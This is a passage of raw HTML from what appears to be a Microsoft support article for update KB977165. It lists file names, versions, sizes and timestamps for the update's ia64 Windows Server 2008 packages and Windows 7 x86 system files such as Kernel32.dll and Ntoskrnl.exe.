class=\"sbody-td\">Package_5_for_kb977165_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,071</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_5_for_kb977165~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,786</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_0_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,415</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_0~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,434</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_1_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,516</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_1~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,539</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,684</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_sc~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,715</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_0_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,419</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_0~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,438</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_1_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,519</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_1~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,543</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_server~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,727</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv_0_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv_0~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,435</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv_bf~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,424</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_winpesrv~31bf3856ad364e35~ia64~~6.0.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,443</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">09-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h3 class=\"sbody-h3\">Windows 7 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SPn), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table: <div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">Version</td><td class=\"sbody-td\">Product</td><td class=\"sbody-td\">Milestone</td><td class=\"sbody-td\">Service branch</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.7600.16xxx</td><td class=\"sbody-td\">Windows 7</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.7600.20xxx</td><td class=\"sbody-td\">Windows 7</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li><li>The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are <a bookmark-id=\"manifests7\" href=\"#manifests7\" managed-link=\"\" target=\"\">listed separately</a> in the \"Additional file information for Windows 7\" section. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files, for which the attributes are not listed, are signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Aelupsvc.dll</td><td class=\"sbody-td\">6.1.7600.16385</td><td class=\"sbody-td\">62,464</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Apphelp.dll</td><td class=\"sbody-td\">6.1.7600.16481</td><td class=\"sbody-td\">292,864</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">11:32</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sdbinst.exe</td><td class=\"sbody-td\">6.0.7600.16385</td><td class=\"sbody-td\">20,992</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shimeng.dll</td><td class=\"sbody-td\">6.1.7600.16385</td><td class=\"sbody-td\">5,120</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Aelupsvc.dll</td><td class=\"sbody-td\">6.1.7600.16385</td><td class=\"sbody-td\">62,464</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Apphelp.dll</td><td class=\"sbody-td\">6.1.7600.20591</td><td class=\"sbody-td\">292,864</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">11:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sdbinst.exe</td><td class=\"sbody-td\">6.0.7600.16385</td><td class=\"sbody-td\">20,992</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shimeng.dll</td><td class=\"sbody-td\">6.1.7600.16385</td><td class=\"sbody-td\">5,120</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Kernel32.dll</td><td class=\"sbody-td\">6.1.7600.16481</td><td class=\"sbody-td\">857,088</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">11:33</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Kernel32.dll</td><td class=\"sbody-td\">6.1.7600.20591</td><td class=\"sbody-td\">857,088</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">11:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">6.1.7600.16481</td><td class=\"sbody-td\">3,955,288</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">11:40</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.1.7600.16481</td><td class=\"sbody-td\">3,899,464</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">11:40</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">6.1.7600.20591</td><td class=\"sbody-td\">3,954,776</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">12:04</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">6.1.7600.20591</td><td class=\"sbody-td\">3,899,992</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">12:04</td><td class=\"sbody-td\">Not Applicable</td></tr></table></div><h3 class=\"sbody-h3\">Additional file information for Windows 7</h3><a class=\"bookmark\" id=\"manifests7\"></a><h4 class=\"sbody-h4\">Additional files for all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb977165_bf~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,415</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb977165~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,813</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb977165_bf~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,082</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb977165~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">5,205</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_rtm_bf~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,921</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb977165_rtm~31bf3856ad364e35~x86~~6.1.1.0.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,958</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,657</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_186a3b50cab2b403840c0898164d7eb2_31bf3856ad364e35_6.1.7600.16481_none_ff1c4ae7b5a097cf.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_1922733cda72e55d4033d1a48609921b_31bf3856ad364e35_6.1.7600.20591_none_7aab541493daaae4.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">725</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_344c8bf5634a5a5ac06c801edcc8f759_31bf3856ad364e35_6.1.7600.20591_none_6dfbdaffa17e5a54.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">697</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_3b62895240e638504adb7953a1c747fb_31bf3856ad364e35_6.1.7600.16481_none_4cc1e1bae09e3a35.manifest</td></tr><tr 